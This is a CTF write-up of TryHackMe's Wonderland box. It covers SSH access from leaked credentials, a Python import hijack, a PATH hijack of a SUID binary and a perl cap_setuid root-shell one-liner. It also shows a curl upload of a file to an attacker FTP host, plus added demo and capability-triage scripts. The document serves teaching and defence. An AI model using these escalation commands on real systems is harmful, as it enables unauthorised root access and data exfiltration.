Wonderland CTF from TryHackMe!
Nov 12, 2020
This CTF is worth a write-up, as it was a bit of a challenge for me.
1. Scanning. As always, I start off by scanning the target machine with Nmap.
2. Enumeration. I like to run dirb and dirbuster to enumerate available directories.
- Both dirb and dirbuster turn up directories such as /img, /r and /r/a.
- /img directory:
- Checking the /r and /r/a pages, each just tells us to keep going, which makes you wonder which way to go. After going through all the available images and directory contents, this one stands out:
- Following the /r/a/b/b/i/t path:
- Examining the page source reveals what appears to be a user's credentials.
- These credentials can be used to log in over SSH, which our Nmap scan earlier showed was open.
3. Gaining Access. Now that we have a user's credentials, we can use them to gain access to the target system.
- SWEET! We now have a shell on the target machine.
- Now we look around for interesting files that lead us to the flag.
- We see root.txt, but it is owned by user root and group root, and obviously we have no permission to read it.
- Now we run sudo -l to list the commands user alice is allowed to run.
- The result tells us: "User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py", which means we can run this Python script as user rabbit.
- So let's execute it: sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
- Each run of the script via sudo as rabbit prints some random lines of a poem.
- The script picks the lines randomly (it imports Python's random module), as cat'ing walrus_and_the_carpenter.py shows:
- This is the weak point. Python searches the directory of the script being run (here /home/alice, which alice owns) before the standard library, so instead of letting walrus_and_the_carpenter.py import the real random module, we create a malicious random.py next to it that executes /bin/bash. When the script is run with sudo -u rabbit, our module is imported and the shell runs as rabbit.
- SWEET! Now we have escalated to the rabbit user.
- Navigating to /home/rabbit reveals a SUID file; alternatively, search the whole filesystem with find / -perm -u=s -type f 2>/dev/null. The one that stands out is teaParty:
- This is what it looks like when executed:
- It is a compiled binary, so we need to look at its contents with strings (or a similar tool) rather than read it as a script:
- On my attacking machine I was running an FTP server (vsftpd).
- From the victim machine I then uploaded teaParty to my attacking machine with curl, to examine its contents with strings:
rabbit@wonderland:/home/rabbit$ curl -T ./teaParty ftp://10.x.x.x --user user:secret
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16816    0     0  100 16816      0   3191  0:00:05  0:00:05 --:--:--  3793
- The strings output shows that the binary executes "date" (the OS command) without an absolute path. This can be abused by prepending a directory we control to $PATH and placing our own small script called date in it.
- The real date lives at /bin/date; we instead create our own date in /tmp and put /tmp at the front of PATH (export PATH=/tmp:$PATH).
- Now, when the binary runs date without an absolute path, the shell searches /tmp first and finds our script (below). /tmp is a good candidate because it is world-writable (permissions open to user, group and others). Because teaParty is SUID, our fake date runs with the binary owner's privileges; if a binary only sets the effective UID, remember that bash drops it again unless started with -p.
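The PATH hijack, as an added example (not the box's code). The "victim" is a constructed shell-script stand-in for teaParty, not the real SUID ELF; the only property it shares is calling `date` by name, so the shell resolves it through $PATH and the first match wins. The fake date just echoes instead of spawning /bin/bash, and a temp directory plays the role of /tmp, so the demo is safe to run. Each run is driven from Python with the PATH that `export PATH=/tmp:$PATH` would produce.

```python
"""PATH hijacking of an unqualified `date` call, the trick used against teaParty."""
import os
import stat
import subprocess
import tempfile
import textwrap
from pathlib import Path

# Constructed stand-in for teaParty: runs date without an absolute path.
VICTIM = textwrap.dedent("""\
    #!/bin/sh
    echo "Welcome to the tea party!"
    echo "Probably by $(date --date='next hour' 2>/dev/null || date)"
""")

# Our /tmp/date. On the box this would start /bin/bash as the SUID owner (assumption: echo here).
FAKE_DATE = textwrap.dedent("""\
    #!/bin/sh
    echo "HIJACKED: date replaced, running as uid $(id -u)"
""")


def write_executable(path: Path, content: str) -> None:
    """Write a script and chmod +x it (the `chmod +x /tmp/date` step)."""
    path.write_text(content)
    path.chmod(path.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)


def run_with_path(victim: Path, path_env: str) -> str:
    """Run the victim under a chosen PATH, the equivalent of `export PATH=...; ./teaParty`."""
    env = dict(os.environ, PATH=path_env)
    return subprocess.run([str(victim)], capture_output=True, text=True, env=env).stdout


def demo() -> dict:
    """Run the victim once with a normal PATH and once with our directory in front."""
    with tempfile.TemporaryDirectory() as d:
        hijack_dir = Path(d) / "tmp"          # plays the role of world-writable /tmp
        hijack_dir.mkdir()
        victim = Path(d) / "teaParty"
        write_executable(victim, VICTIM)
        write_executable(hijack_dir / "date", FAKE_DATE)
        return {
            "before": run_with_path(victim, "/usr/bin:/bin"),            # real /bin/date answers
            "after": run_with_path(victim, f"{hijack_dir}:/usr/bin:/bin"),  # our script answers
        }


if __name__ == "__main__":
    for label, out in demo().items():
        print(f"--- {label} ---\n{out}")
```

The defensive takeaway is the same one the exploit relies on: a SUID program must call helpers by absolute path (or reset PATH itself), because it cannot trust the environment its caller hands it.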
- Now we have escalated to the hatter user. Time to look around for interesting files again, this time in /home/hatter:
- With hatter's password revealed, we can SSH in as hatter:
- The next thing I needed was to escalate privileges again. This time I used linpeas.sh (Linux Privilege Escalation Awesome Script) to enumerate possible vectors.
- To get the script onto the target, I ran a simple Python HTTP server (python3 -m http.server) on my attacking machine and downloaded the file from the target machine.
- One of the interesting results is below: perl has the Linux CAP_SETUID capability set. As the GTFOBins entry for perl puts it, if a binary has the CAP_SETUID capability set, or is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
- Then executing the perl one-liner from that reference, which calls setuid(0) and execs a shell, gives us root.
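A small triage of file capabilities, as an added example (not part of linpeas or the box). linpeas gets this finding from `getcap -r / 2>/dev/null`; the sample lines below are constructed in that shape (both the older `path = caps+flags` and the newer `path caps=flags` output styles) and seeded with the perl finding described above, plus benign entries and one permitted-only entry so the effective-flag check is visible.

```python
"""Triage getcap output for capabilities that lead straight to root."""
import re

# Capabilities an attacker can turn into root (or arbitrary file access) when set on
# a binary that does what its caller asks, such as an interpreter.
DANGEROUS_CAPS = {
    "cap_setuid": "setuid(0) then exec a shell",
    "cap_setgid": "setgid(0), e.g. read shadow-group files",
    "cap_dac_override": "bypass file permission checks",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow",
    "cap_sys_admin": "near-root (mounts, namespaces)",
    "cap_sys_ptrace": "attach to root-owned processes",
    "cap_sys_module": "load kernel modules",
}

# Constructed sample of `getcap -r /` output (not real linpeas output).
SAMPLE_GETCAP = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping cap_net_raw=ep
/opt/backup-agent cap_dac_read_search=p
"""

LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>\S+)$")


def parse_getcap(text):
    """Return (path, {cap names}, flags) per line; lines that do not parse are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # "cap_a,cap_b+ep" (libcap < 2.41) or "cap_a,cap_b=ep" (newer): split off the flags
        parts = re.split(r"[+=]", m.group("caps"), maxsplit=1)
        names = set(parts[0].split(","))
        flags = parts[1] if len(parts) == 2 else ""
        entries.append((m.group("path"), names, flags))
    return entries


def triage(text):
    """Return [(path, cap, effective)] for dangerous caps. effective=True means the 'e'
    flag is set, so the cap is live as soon as the binary runs; with only 'p' the
    binary must raise it itself before use, which is still worth a look."""
    hits = []
    for path, names, flags in parse_getcap(text):
        for cap in sorted(names & DANGEROUS_CAPS.keys()):
            hits.append((path, cap, "e" in flags))
    return hits


if __name__ == "__main__":
    for path, cap, effective in triage(SAMPLE_GETCAP):
        state = "effective" if effective else "permitted only"
        print(f"{path}: {cap} ({state}) -> {DANGEROUS_CAPS[cap]}")
```

For perl with cap_setuid+ep, the standard GTFOBins technique (which I am quoting from memory of that reference, not from the page) is `perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'`: the interpreter's own capability lets the script set its UID to 0 and then exec a root shell. The check to run on your own hosts is the same getcap command; an interpreter or other general-purpose binary with cap_setuid is a root-equivalent finding.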
- CTF SOLVED!!!